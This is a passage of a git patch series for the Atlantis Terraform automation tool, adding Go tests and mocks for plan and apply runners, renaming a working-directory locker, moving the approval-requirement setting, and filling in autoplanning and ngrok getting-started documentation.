+	"github.com/runatlantis/atlantis/server/events"
+	"github.com/runatlantis/atlantis/server/events/mocks"
+	"github.com/runatlantis/atlantis/server/events/mocks/matchers"
+	"github.com/runatlantis/atlantis/server/events/models"
+	mocks2 "github.com/runatlantis/atlantis/server/events/runtime/mocks"
+	"github.com/runatlantis/atlantis/server/events/yaml/valid"
+	"github.com/runatlantis/atlantis/server/logging"
+	. "github.com/runatlantis/atlantis/testing"
+)
+
+func TestDefaultProjectCommandRunner_Plan(t *testing.T) {
+	cases := []struct {
+		description string
+		projCfg     *valid.Project
+		globalCfg   *valid.Config
+		expSteps    []string
+		expOut      string
+	}{
+		{
+			description: "use defaults",
+			projCfg:     nil,
+			globalCfg:   nil,
+			expSteps:    []string{"init", "plan"},
+			expOut:      "init\nplan",
+		},
+		{
+			description: "no workflow, use defaults",
+			projCfg: &valid.Project{
+				Dir: ".",
+			},
+			globalCfg: &valid.Config{
+				Version: 2,
+				Projects: []valid.Project{
+					{
+						Dir: ".",
+					},
+				},
+			},
+			expSteps: []string{"init", "plan"},
+			expOut:   "init\nplan",
+		},
+		{
+			description: "workflow without plan stage set",
+			projCfg: &valid.Project{
+				Dir:      ".",
+				Workflow: String("myworkflow"),
+			},
+			globalCfg: &valid.Config{
+				Version: 2,
+				Projects: []valid.Project{
+					{
+						Dir: ".",
+					},
+				},
+				Workflows: map[string]valid.Workflow{
+					"myworkflow": {
+						Apply: &valid.Stage{
+							Steps: nil,
+						},
+					},
+				},
+			},
+			expSteps: []string{"init", "plan"},
+			expOut:   "init\nplan",
+		},
+		{
+			description: "workflow with custom plan stage",
+			projCfg: &valid.Project{
+				Dir:      ".",
+				Workflow: String("myworkflow"),
+			},
+			globalCfg: &valid.Config{
+				Version: 2,
+				Projects: []valid.Project{
+					{
+						Dir: ".",
+					},
+				},
+				Workflows: map[string]valid.Workflow{
+					"myworkflow": {
+						Plan: &valid.Stage{
+							Steps: []valid.Step{
+								{
+									StepName: "run",
+								},
+								{
+									StepName: "apply",
+								},
+								{
+									StepName: "plan",
+								},
+								{
+									StepName: "init",
+								},
+							},
+						},
+					},
+				},
+			},
+			expSteps: []string{"run", "apply", "plan", "init"},
+			expOut:   "run\napply\nplan\ninit",
+		},
+	}
+
+	for _, c := range cases {
+		t.Run(strings.Join(c.expSteps, ","), func(t *testing.T) {
+			RegisterMockTestingT(t)
+			mockInit := mocks.NewMockStepRunner()
+			mockPlan := mocks.NewMockStepRunner()
+			mockApply := mocks.NewMockStepRunner()
+			mockRun := mocks.NewMockStepRunner()
+			mockWorkingDir := mocks.NewMockWorkingDir()
+			mockLocker := mocks.NewMockProjectLocker()
+
+			runner := events.DefaultProjectCommandRunner{
+				Locker:              mockLocker,
+				LockURLGenerator:    mockURLGenerator{},
+				InitStepRunner:      mockInit,
+				PlanStepRunner:      mockPlan,
+				ApplyStepRunner:     mockApply,
+				RunStepRunner:       mockRun,
+				PullApprovedChecker: nil,
+				WorkingDir:          mockWorkingDir,
+				Webhooks:            nil,
+				WorkingDirLocker:    events.NewDefaultWorkingDirLocker(),
+			}
+
+			repoDir := "/tmp/mydir"
+			When(mockWorkingDir.Clone(
+				matchers.AnyPtrToLoggingSimpleLogger(),
+				matchers.AnyModelsRepo(),
+				matchers.AnyModelsRepo(),
+				matchers.AnyModelsPullRequest(),
+				AnyString(),
+			)).ThenReturn(repoDir, nil)
+			When(mockLocker.TryLock(
+				matchers.AnyPtrToLoggingSimpleLogger(),
+				matchers.AnyModelsPullRequest(),
+				matchers.AnyModelsUser(),
+				AnyString(),
+				matchers.AnyModelsProject(),
+			)).ThenReturn(&events.TryLockResponse{
+				LockAcquired: true,
+				LockKey:      "lock-key",
+			}, nil)
+
+			ctx := models.ProjectCommandContext{
+				Log:           logging.NewNoopLogger(),
+				ProjectConfig: c.projCfg,
+				Workspace:     "default",
+				GlobalConfig:  c.globalCfg,
+				RepoRelDir:    ".",
+			}
+			When(mockInit.Run(ctx, nil, repoDir)).ThenReturn("init", nil)
+			When(mockPlan.Run(ctx, nil, repoDir)).ThenReturn("plan", nil)
+			When(mockApply.Run(ctx, nil, repoDir)).ThenReturn("apply", nil)
+			When(mockRun.Run(ctx, nil, repoDir)).ThenReturn("run", nil)
+
+			res := runner.Plan(ctx)
+
+			Assert(t, res.PlanSuccess != nil, "exp plan success")
+			Equals(t, "https://lock-key", res.PlanSuccess.LockURL)
+			Equals(t, c.expOut, res.PlanSuccess.TerraformOutput)
+
+			for _, step := range c.expSteps {
+				switch step {
+				case "init":
+					mockInit.VerifyWasCalledOnce().Run(ctx, nil, repoDir)
+				case "plan":
+					mockPlan.VerifyWasCalledOnce().Run(ctx, nil, repoDir)
+				case "apply":
+					mockApply.VerifyWasCalledOnce().Run(ctx, nil, repoDir)
+				case "run":
+					mockRun.VerifyWasCalledOnce().Run(ctx, nil, repoDir)
+				}
+			}
+		})
+	}
+}
+
+func TestDefaultProjectCommandRunner_ApplyNotCloned(t *testing.T) {
+	mockWorkingDir := mocks.NewMockWorkingDir()
+	runner := &events.DefaultProjectCommandRunner{
+		WorkingDir: mockWorkingDir,
+	}
+	ctx := models.ProjectCommandContext{}
+	When(mockWorkingDir.GetWorkingDir(ctx.BaseRepo, ctx.Pull, ctx.Workspace)).ThenReturn("", os.ErrNotExist)
+
+	res := runner.Apply(ctx)
+	ErrEquals(t, "project has not been cloned–did you run plan?", res.Error)
+}
+
+func TestDefaultProjectCommandRunner_ApplyNotApproved(t *testing.T) {
+	RegisterMockTestingT(t)
+	mockWorkingDir := mocks.NewMockWorkingDir()
+	mockApproved := mocks2.NewMockPullApprovedChecker()
+	runner := &events.DefaultProjectCommandRunner{
+		WorkingDir:              mockWorkingDir,
+		PullApprovedChecker:     mockApproved,
+		WorkingDirLocker:        events.NewDefaultWorkingDirLocker(),
+		RequireApprovalOverride: true,
+	}
+	ctx := models.ProjectCommandContext{}
+	When(mockWorkingDir.GetWorkingDir(ctx.BaseRepo, ctx.Pull, ctx.Workspace)).ThenReturn("/tmp/mydir", nil)
+	When(mockApproved.PullIsApproved(ctx.BaseRepo, ctx.Pull)).ThenReturn(false, nil)
+
+	res := runner.Apply(ctx)
+	Equals(t, "Pull request must be approved before running apply.", res.Failure)
+}
+
+func TestDefaultProjectCommandRunner_Apply(t *testing.T) {
+	cases := []struct {
+		description string
+		projCfg     *valid.Project
+		globalCfg   *valid.Config
+		expSteps    []string
+		expOut      string
+	}{
+		{
+			description: "use defaults",
+			projCfg:     nil,
+			globalCfg:   nil,
+			expSteps:    []string{"apply"},
+			expOut:      "apply",
+		},
+		{
+			description: "no workflow, use defaults",
+			projCfg: &valid.Project{
+				Dir: ".",
+			},
+			globalCfg: &valid.Config{
+				Version: 2,
+				Projects: []valid.Project{
+					{
+						Dir: ".",
+					},
+				},
+			},
+			expSteps: []string{"apply"},
+			expOut:   "apply",
+		},
+		{
+			description: "no workflow, approval required, use defaults",
+			projCfg: &valid.Project{
+				Dir:               ".",
+				ApplyRequirements: []string{"approved"},
+			},
+			globalCfg: &valid.Config{
+				Version: 2,
+				Projects: []valid.Project{
+					{
+						Dir:               ".",
+						ApplyRequirements: []string{"approved"},
+					},
+				},
+			},
+			expSteps: []string{"approved", "apply"},
+			expOut:   "apply",
+		},
+		{
+			description: "workflow without apply stage set",
+			projCfg: &valid.Project{
+				Dir:      ".",
+				Workflow: String("myworkflow"),
+			},
+			globalCfg: &valid.Config{
+				Version: 2,
+				Projects: []valid.Project{
+					{
+						Dir: ".",
+					},
+				},
+				Workflows: map[string]valid.Workflow{
+					"myworkflow": {
+						Plan: &valid.Stage{
+							Steps: nil,
+						},
+					},
+				},
+			},
+			expSteps: []string{"apply"},
+			expOut:   "apply",
+		},
+		{
+			description: "workflow with custom apply stage",
+			projCfg: &valid.Project{
+				Dir:      ".",
+				Workflow: String("myworkflow"),
+			},
+			globalCfg: &valid.Config{
+				Version: 2,
+				Projects: []valid.Project{
+					{
+						Dir: ".",
+					},
+				},
+				Workflows: map[string]valid.Workflow{
+					"myworkflow": {
+						Apply: &valid.Stage{
+							Steps: []valid.Step{
+								{
+									StepName: "run",
+								},
+								{
+									StepName: "apply",
+								},
+								{
+									StepName: "plan",
+								},
+								{
+									StepName: "init",
+								},
+							},
+						},
+					},
+				},
+			},
+			expSteps: []string{"run", "apply", "plan", "init"},
+			expOut:   "run\napply\nplan\ninit",
+		},
+	}
+
+	for _, c := range cases {
+		t.Run(strings.Join(c.expSteps, ","), func(t *testing.T) {
+			RegisterMockTestingT(t)
+			mockInit := mocks.NewMockStepRunner()
+			mockPlan := mocks.NewMockStepRunner()
+			mockApply := mocks.NewMockStepRunner()
+			mockRun := mocks.NewMockStepRunner()
+			mockApproved := mocks2.NewMockPullApprovedChecker()
+			mockWorkingDir := mocks.NewMockWorkingDir()
+			mockLocker := mocks.NewMockProjectLocker()
+			mockSender := mocks.NewMockWebhooksSender()
+
+			runner := events.DefaultProjectCommandRunner{
+				Locker:              mockLocker,
+				LockURLGenerator:    mockURLGenerator{},
+				InitStepRunner:      mockInit,
+				PlanStepRunner:      mockPlan,
+				ApplyStepRunner:     mockApply,
+				RunStepRunner:       mockRun,
+				PullApprovedChecker: mockApproved,
+				WorkingDir:          mockWorkingDir,
+				Webhooks:            mockSender,
+				WorkingDirLocker:    events.NewDefaultWorkingDirLocker(),
+			}
+
+			repoDir := "/tmp/mydir"
+			When(mockWorkingDir.GetWorkingDir(
+				matchers.AnyModelsRepo(),
+				matchers.AnyModelsPullRequest(),
+				AnyString(),
+			)).ThenReturn(repoDir, nil)
+
+			ctx := models.ProjectCommandContext{
+				Log:           logging.NewNoopLogger(),
+				ProjectConfig: c.projCfg,
+				Workspace:     "default",
+				GlobalConfig:  c.globalCfg,
+				RepoRelDir:    ".",
+			}
+			When(mockInit.Run(ctx, nil, repoDir)).ThenReturn("init", nil)
+			When(mockPlan.Run(ctx, nil, repoDir)).ThenReturn("plan", nil)
+			When(mockApply.Run(ctx, nil, repoDir)).ThenReturn("apply", nil)
+			When(mockRun.Run(ctx, nil, repoDir)).ThenReturn("run", nil)
+			When(mockApproved.PullIsApproved(ctx.BaseRepo, ctx.Pull)).ThenReturn(true, nil)
+
+			res := runner.Apply(ctx)
+			Equals(t, c.expOut, res.ApplySuccess)
+
+			for _, step := range c.expSteps {
+				switch step {
+				case "approved":
+					mockApproved.VerifyWasCalledOnce().PullIsApproved(ctx.BaseRepo, ctx.Pull)
+				case "init":
+					mockInit.VerifyWasCalledOnce().Run(ctx, nil, repoDir)
+				case "plan":
+					mockPlan.VerifyWasCalledOnce().Run(ctx, nil, repoDir)
+				case "apply":
+					mockApply.VerifyWasCalledOnce().Run(ctx, nil, repoDir)
+				case "run":
+					mockRun.VerifyWasCalledOnce().Run(ctx, nil, repoDir)
+				}
+			}
+		})
+	}
+}
+
+type mockURLGenerator struct{}
+
+func (m mockURLGenerator) GenerateLockURL(lockID string) string {
+	return "https://" + lockID
+}
diff --git a/server/events/runtime/mocks/matchers/models_pullrequest.go b/server/events/runtime/mocks/matchers/models_pullrequest.go
new file mode 100644
index 0000000000..d8b146baa4
--- /dev/null
+++ b/server/events/runtime/mocks/matchers/models_pullrequest.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+	"reflect"
+
+	"github.com/petergtz/pegomock"
+	models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+func AnyModelsPullRequest() models.PullRequest {
+	pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(models.PullRequest))(nil)).Elem()))
+	var nullValue models.PullRequest
+	return nullValue
+}
+
+func EqModelsPullRequest(value models.PullRequest) models.PullRequest {
+	pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+	var nullValue models.PullRequest
+	return nullValue
+}
diff --git a/server/events/runtime/mocks/matchers/models_repo.go b/server/events/runtime/mocks/matchers/models_repo.go
new file mode 100644
index 0000000000..3f8e699ebe
--- /dev/null
+++ b/server/events/runtime/mocks/matchers/models_repo.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+	"reflect"
+
+	"github.com/petergtz/pegomock"
+	models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+func AnyModelsRepo() models.Repo {
+	pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(models.Repo))(nil)).Elem()))
+	var nullValue models.Repo
+	return nullValue
+}
+
+func EqModelsRepo(value models.Repo) models.Repo {
+	pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+	var nullValue models.Repo
+	return nullValue
+}
diff --git a/server/events/runtime/mocks/mock_pull_approved_checker.go b/server/events/runtime/mocks/mock_pull_approved_checker.go
new file mode 100644
index 0000000000..69f1e4a502
--- /dev/null
+++ b/server/events/runtime/mocks/mock_pull_approved_checker.go
@@ -0,0 +1,84 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server/events/runtime (interfaces: PullApprovedChecker)
+
+package mocks
+
+import (
+	"reflect"
+
+	pegomock "github.com/petergtz/pegomock"
+	models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+type MockPullApprovedChecker struct {
+	fail func(message string, callerSkip ...int)
+}
+
+func NewMockPullApprovedChecker() *MockPullApprovedChecker {
+	return &MockPullApprovedChecker{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockPullApprovedChecker) PullIsApproved(baseRepo models.Repo, pull models.PullRequest) (bool, error) {
+	params := []pegomock.Param{baseRepo, pull}
+	result := pegomock.GetGenericMockFrom(mock).Invoke("PullIsApproved", params, []reflect.Type{reflect.TypeOf((*bool)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+	var ret0 bool
+	var ret1 error
+	if len(result) != 0 {
+		if result[0] != nil {
+			ret0 = result[0].(bool)
+		}
+		if result[1] != nil {
+			ret1 = result[1].(error)
+		}
+	}
+	return ret0, ret1
+}
+
+func (mock *MockPullApprovedChecker) VerifyWasCalledOnce() *VerifierPullApprovedChecker {
+	return &VerifierPullApprovedChecker{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockPullApprovedChecker) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierPullApprovedChecker {
+	return &VerifierPullApprovedChecker{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockPullApprovedChecker) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierPullApprovedChecker {
+	return &VerifierPullApprovedChecker{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierPullApprovedChecker struct {
+	mock                   *MockPullApprovedChecker
+	invocationCountMatcher pegomock.Matcher
+	inOrderContext         *pegomock.InOrderContext
+}
+
+func (verifier *VerifierPullApprovedChecker) PullIsApproved(baseRepo models.Repo, pull models.PullRequest) *PullApprovedChecker_PullIsApproved_OngoingVerification {
+	params := []pegomock.Param{baseRepo, pull}
+	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "PullIsApproved", params)
+	return &PullApprovedChecker_PullIsApproved_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type PullApprovedChecker_PullIsApproved_OngoingVerification struct {
+	mock              *MockPullApprovedChecker
+	methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *PullApprovedChecker_PullIsApproved_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest) {
+	baseRepo, pull := c.GetAllCapturedArguments()
+	return baseRepo[len(baseRepo)-1], pull[len(pull)-1]
+}
+
+func (c *PullApprovedChecker_PullIsApproved_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest) {
+	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+	if len(params) > 0 {
+		_param0 = make([]models.Repo, len(params[0]))
+		for u, param := range params[0] {
+			_param0[u] = param.(models.Repo)
+		}
+		_param1 = make([]models.PullRequest, len(params[1]))
+		for u, param := range params[1] {
+			_param1[u] = param.(models.PullRequest)
+		}
+	}
+	return
+}
diff --git a/server/events/runtime/pull_approved_checker.go b/server/events/runtime/pull_approved_checker.go
index 86945fce33..e77aa2acb1 100644
--- a/server/events/runtime/pull_approved_checker.go
+++ b/server/events/runtime/pull_approved_checker.go
@@ -4,6 +4,8 @@ import (
 	"github.com/runatlantis/atlantis/server/events/models"
 )
 
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_pull_approved_checker.go PullApprovedChecker
+
 type PullApprovedChecker interface {
 	PullIsApproved(baseRepo models.Repo, pull models.PullRequest) (bool, error)
 }
diff --git a/server/events/working_dir_locker.go b/server/events/working_dir_locker.go
index 8c45891c75..6c5559b415 100644
--- a/server/events/working_dir_locker.go
+++ b/server/events/working_dir_locker.go
@@ -36,20 +36,20 @@ type WorkingDirLocker interface {
 	Unlock(repoFullName, workspace string, pullNum int)
 }
 
-// DefaultAtlantisWorkingDirLocker implements WorkingDirLocker.
-type DefaultAtlantisWorkingDirLocker struct {
+// DefaultWorkingDirLocker implements WorkingDirLocker.
+type DefaultWorkingDirLocker struct {
 	mutex sync.Mutex
 	locks map[string]interface{}
 }
 
-// NewDefaultAtlantisWorkingDirLocker is a constructor.
-func NewDefaultAtlantisWorkingDirLocker() *DefaultAtlantisWorkingDirLocker {
-	return &DefaultAtlantisWorkingDirLocker{
+// NewDefaultWorkingDirLocker is a constructor.
+func NewDefaultWorkingDirLocker() *DefaultWorkingDirLocker {
+	return &DefaultWorkingDirLocker{
 		locks: make(map[string]interface{}),
 	}
 }
 
-func (d *DefaultAtlantisWorkingDirLocker) TryLock(repoFullName string, workspace string, pullNum int) (func(), error) {
+func (d *DefaultWorkingDirLocker) TryLock(repoFullName string, workspace string, pullNum int) (func(), error) {
 	d.mutex.Lock()
 	defer d.mutex.Unlock()
 
@@ -67,12 +67,12 @@ func (d *DefaultAtlantisWorkingDirLocker) TryLock(repoFullName string, workspace
 }
 
 // Unlock unlocks the repo, pull and workspace.
-func (d *DefaultAtlantisWorkingDirLocker) Unlock(repoFullName, workspace string, pullNum int) {
+func (d *DefaultWorkingDirLocker) Unlock(repoFullName, workspace string, pullNum int) {
 	d.mutex.Lock()
 	defer d.mutex.Unlock()
 	delete(d.locks, d.key(repoFullName, workspace, pullNum))
 }
 
-func (d *DefaultAtlantisWorkingDirLocker) key(repo string, workspace string, pull int) string {
+func (d *DefaultWorkingDirLocker) key(repo string, workspace string, pull int) string {
 	return fmt.Sprintf("%s/%s/%d", repo, workspace, pull)
 }
diff --git a/server/events/working_dir_locker_test.go b/server/events/working_dir_locker_test.go
index 1083ba4221..52274af3ab 100644
--- a/server/events/working_dir_locker_test.go
+++ b/server/events/working_dir_locker_test.go
@@ -24,7 +24,7 @@ var repo = "repo/owner"
 var workspace = "default"
 
 func TestTryLock(t *testing.T) {
-	locker := events.NewDefaultAtlantisWorkingDirLocker()
+	locker := events.NewDefaultWorkingDirLocker()
 
 	// The first lock should succeed.
 	unlockFn, err := locker.TryLock(repo, workspace, 1)
@@ -43,7 +43,7 @@ func TestTryLock(t *testing.T) {
 }
 
 func TestTryLockDifferentWorkspaces(t *testing.T) {
-	locker := events.NewDefaultAtlantisWorkingDirLocker()
+	locker := events.NewDefaultWorkingDirLocker()
 
 	t.Log("a lock for the same repo and pull but different workspace should succeed")
 	_, err := locker.TryLock(repo, workspace, 1)
@@ -59,7 +59,7 @@ func TestTryLockDifferentWorkspaces(t *testing.T) {
 }
 
 func TestTryLockDifferentRepo(t *testing.T) {
-	locker := events.NewDefaultAtlantisWorkingDirLocker()
+	locker := events.NewDefaultWorkingDirLocker()
 
 	t.Log("a lock for a different repo but the same workspace and pull should succeed")
 	_, err := locker.TryLock(repo, workspace, 1)
@@ -76,7 +76,7 @@ func TestTryLockDifferentRepo(t *testing.T) {
 }
 
 func TestTryLockDifferentPulls(t *testing.T) {
-	locker := events.NewDefaultAtlantisWorkingDirLocker()
+	locker := events.NewDefaultWorkingDirLocker()
 
 	t.Log("a lock for a different pull but the same repo and workspace should succeed")
 	_, err := locker.TryLock(repo, workspace, 1)
@@ -93,7 +93,7 @@ func TestTryLockDifferentPulls(t *testing.T) {
 }
 
 func TestUnlock(t *testing.T) {
-	locker := events.NewDefaultAtlantisWorkingDirLocker()
+	locker := events.NewDefaultWorkingDirLocker()
 
 	t.Log("unlocking should work")
 	unlockFn, err := locker.TryLock(repo, workspace, 1)
@@ -104,7 +104,7 @@ func TestUnlock(t *testing.T) {
 }
 
 func TestUnlockDifferentWorkspaces(t *testing.T) {
-	locker := events.NewDefaultAtlantisWorkingDirLocker()
+	locker := events.NewDefaultWorkingDirLocker()
 	t.Log("unlocking should work for different workspaces")
 	unlockFn1, err1 := locker.TryLock(repo, workspace, 1)
 	Ok(t, err1)
@@ -120,7 +120,7 @@ func TestUnlockDifferentWorkspaces(t *testing.T) {
 }
 
 func TestUnlockDifferentRepos(t *testing.T) {
-	locker := events.NewDefaultAtlantisWorkingDirLocker()
+	locker := events.NewDefaultWorkingDirLocker()
 	t.Log("unlocking should work for different repos")
 	unlockFn1, err1 := locker.TryLock(repo, workspace, 1)
 	Ok(t, err1)
@@ -137,7 +137,7 @@ func TestUnlockDifferentRepos(t *testing.T) {
 }
 
 func TestUnlockDifferentPulls(t *testing.T) {
-	locker := events.NewDefaultAtlantisWorkingDirLocker()
+	locker := events.NewDefaultWorkingDirLocker()
 	t.Log("unlocking should work for different pulls")
 	unlockFn1, err1 := locker.TryLock(repo, workspace, 1)
 	Ok(t, err1)
diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go
index b50215b3e8..d69471cb23 100644
--- a/server/events_controller_e2e_test.go
+++ b/server/events_controller_e2e_test.go
@@ -236,23 +236,23 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy,
 	}
 
 	defaultTFVersion := terraformClient.Version()
-	locker := events.NewDefaultAtlantisWorkingDirLocker()
+	locker := events.NewDefaultWorkingDirLocker()
 	commandRunner := &events.DefaultCommandRunner{
 		ProjectCommandRunner: &events.DefaultProjectCommandRunner{
 			Locker:           projectLocker,
 			LockURLGenerator: &mockLockURLGenerator{},
-			InitStepRunner: runtime.InitStepRunner{
+			InitStepRunner: &runtime.InitStepRunner{
 				TerraformExecutor: terraformClient,
 				DefaultTFVersion:  defaultTFVersion,
 			},
-			PlanStepRunner: runtime.PlanStepRunner{
+			PlanStepRunner: &runtime.PlanStepRunner{
 				TerraformExecutor: terraformClient,
 				DefaultTFVersion:  defaultTFVersion,
 			},
-			ApplyStepRunner: runtime.ApplyStepRunner{
+			ApplyStepRunner: &runtime.ApplyStepRunner{
 				TerraformExecutor: terraformClient,
 			},
-			RunStepRunner: runtime.RunStepRunner{
+			RunStepRunner: &runtime.RunStepRunner{
 				DefaultTFVersion: defaultTFVersion,
 			},
 			PullApprovedChecker: e2eVCSClient,
@@ -277,7 +277,6 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy,
 			WorkingDirLocker:    locker,
 			AllowRepoConfigFlag: "allow-repo-config",
 			AllowRepoConfig:     true,
-			RequireApproval:     false,
 		},
 	}
 
diff --git a/server/server.go b/server/server.go
index 0d7c595932..7adafb8a95 100644
--- a/server/server.go
+++ b/server/server.go
@@ -190,7 +190,7 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 		return nil, err
 	}
 	lockingClient := locking.NewClient(boltdb)
-	workingDirLocker := events.NewDefaultAtlantisWorkingDirLocker()
+	workingDirLocker := events.NewDefaultWorkingDirLocker()
 	workingDir := &events.FileWorkspace{
 		DataDir: userConfig.DataDir,
 	}
@@ -239,31 +239,31 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 			VCSClient:           vcsClient,
 			WorkingDir:          workingDir,
 			WorkingDirLocker:    workingDirLocker,
-			RequireApproval:     userConfig.RequireApproval,
 			AllowRepoConfig:     userConfig.AllowRepoConfig,
 			AllowRepoConfigFlag: config.AllowRepoConfigFlag,
 		},
 		ProjectCommandRunner: &events.DefaultProjectCommandRunner{
 			Locker:           projectLocker,
 			LockURLGenerator: router,
-			InitStepRunner: runtime.InitStepRunner{
+			InitStepRunner: &runtime.InitStepRunner{
 				TerraformExecutor: terraformClient,
 				DefaultTFVersion:  defaultTfVersion,
 			},
-			PlanStepRunner: runtime.PlanStepRunner{
+			PlanStepRunner: &runtime.PlanStepRunner{
 				TerraformExecutor: terraformClient,
 				DefaultTFVersion:  defaultTfVersion,
 			},
-			ApplyStepRunner: runtime.ApplyStepRunner{
+			ApplyStepRunner: &runtime.ApplyStepRunner{
 				TerraformExecutor: terraformClient,
 			},
-			RunStepRunner: runtime.RunStepRunner{
+			RunStepRunner: &runtime.RunStepRunner{
 				DefaultTFVersion: defaultTfVersion,
 			},
-			PullApprovedChecker: vcsClient,
-			WorkingDir:          workingDir,
-			Webhooks:            webhooksManager,
-			WorkingDirLocker:    workingDirLocker,
+			PullApprovedChecker:     vcsClient,
+			WorkingDir:              workingDir,
+			Webhooks:                webhooksManager,
+			WorkingDirLocker:        workingDirLocker,
+			RequireApprovalOverride: userConfig.RequireApproval,
 		},
 	}
 	repoWhitelist := &events.RepoWhitelistChecker{

From 502c6265fb9bd7824c99f2d0ebbdd83808dbed70 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Mon, 2 Jul 2018 14:34:24 +0200
Subject: [PATCH 64/69] Fix doc todos

---
 runatlantis.io/docs/autoplanning.md     | 28 +++++++++++++++++++++----
 runatlantis.io/guide/getting-started.md | 12 +++++------
 2 files changed, 30 insertions(+), 10 deletions(-)

diff --git a/runatlantis.io/docs/autoplanning.md b/runatlantis.io/docs/autoplanning.md
index 92480e0994..8260ed98b2 100644
--- a/runatlantis.io/docs/autoplanning.md
+++ b/runatlantis.io/docs/autoplanning.md
@@ -10,10 +10,30 @@ The algorithm it uses is as follows:
 1. If it does contain `modules/` look at the directory one level above `modules/`. If it
 contains a `main.tf` run plan in that directory, otherwise ignore the change.
 
-todo: add example
+## Example
+Given the directory structure:
+```
+.
+├── modules
+│   └── module1
+│       └── main.tf
+└── project1
+    ├── main.tf
+    └── modules
+        └── module1
+            └── main.tf
+```
 
-If you would like to configure how Atlantis determines which directory to run in
+* If `project1/main.tf` were modified, we would run `plan` in `project1`
+* If `modules/module1/main.tf` were modified, we would not automatically run `plan` because we couldn't determine the location of the terraform project
+    * You could use an [atlantis.yaml](../guide/atlantis-yaml-use-cases.html#configuring-autoplanning) file to specify which projects to plan when this module changed
+    * Or you could manually plan with `atlantis plan -d <dir>`
+* If `project1/modules/module1/main.tf` were modified, we would look one level above `project1/modules`
+into `project1/`, see that there was a `main.tf` file and so run plan in `project1/`
+
+## Customizing
+If you would like to customize how Atlantis determines which directory to run in
 or disable it all together you need to create an `atlantis.yaml` file.
 See
-* Disabling Autoplanning
-* Configur
+* [Disabling Autoplanning](../guide/atlantis-yaml-use-cases.html#disabling-autoplanning)
+* [Configuring Autoplanning](../guide/atlantis-yaml-use-cases.html#configuring-autoplanning)
diff --git a/runatlantis.io/guide/getting-started.md b/runatlantis.io/guide/getting-started.md
index 1085a63dd8..d455de04a5 100644
--- a/runatlantis.io/guide/getting-started.md
+++ b/runatlantis.io/guide/getting-started.md
@@ -26,16 +26,16 @@ Atlantis needs to be accessible somewhere that github.com/gitlab.com or your Git
 One way to accomplish this is with ngrok, a tool that forwards your local port to a random
 public hostname.
 
-TODO: ngrok download instructions
+Go to [https://ngrok.com/download](https://ngrok.com/download), download ngrok and `unzip` it.
 
-Start `ngrok` on port `4141`:
-```
-ngrok http 4141
+Start `ngrok` on port `4141` and take note of the hostname it gives you:
+```bash
+./ngrok http 4141
 ```
 
 In a new tab (where you'll soon start Atlantis) create an environment variable with
-the URL ngrok output:
-```
+ngrok's hostname:
+```bash
 URL=https://{YOUR_HOSTNAME}.ngrok.io
 ```
 

From ef728de0f390886dbd7d42f0f29d48cab584ccc2 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Mon, 2 Jul 2018 14:39:34 +0200
Subject: [PATCH 65/69] Change testdrive docs for autoplan

---
 testdrive/testdrive.go | 39 ++++++++++++++++++++++++++++++++++-----
 1 file changed, 34 insertions(+), 5 deletions(-)

diff --git a/testdrive/testdrive.go b/testdrive/testdrive.go
index 368eb8db2a..a0de2c65d6 100644
--- a/testdrive/testdrive.go
+++ b/testdrive/testdrive.go
@@ -47,11 +47,40 @@ This mode sets up Atlantis on a test repo so you can try it out. We will
 
 [bold]Press Ctrl-c at any time to exit
 `
-var pullRequestBody = "In this pull request we will learn how to use atlantis. There are various commands that are available to you:\n" +
-	"* Start by typing `atlantis help` in the comments.\n" +
-	"* Next, lets plan by typing `atlantis plan` in the comments. That will run a `terraform plan`.\n" +
-	"* Now lets apply that plan. Type `atlantis apply` in the comments. This will run a `terraform apply`.\n" +
-	"\nThank you for trying out atlantis. For more info on running atlantis in production see https://github.com/runatlantis/atlantis"
+var pullRequestBody = strings.Replace(`
+In this pull request we will learn how to use Atlantis.
+
+1. In a couple of seconds you should see the output of Atlantis automatically running $terraform plan$.
+
+1. You can manually run $plan$ by typing a comment:
+
+    $$$
+    atlantis plan
+    $$$
+    Usually you'll let Atlantis automatically run plan for you though.
+
+1. To see all the comment commands available, type:
+    $$$
+    atlantis help
+    $$$
+
+1. To see the help for a specific command, for example $atlantis plan$, type:
+    $$$
+    atlantis plan --help
+    $$$
+
+1. Atlantis holds a "Lock" on this directory to prevent other pull requests modifying
+   the Terraform state until this pull request is merged. To view the lock, go to the Atlantis UI: [http://localhost:4141](http://localhost:4141).
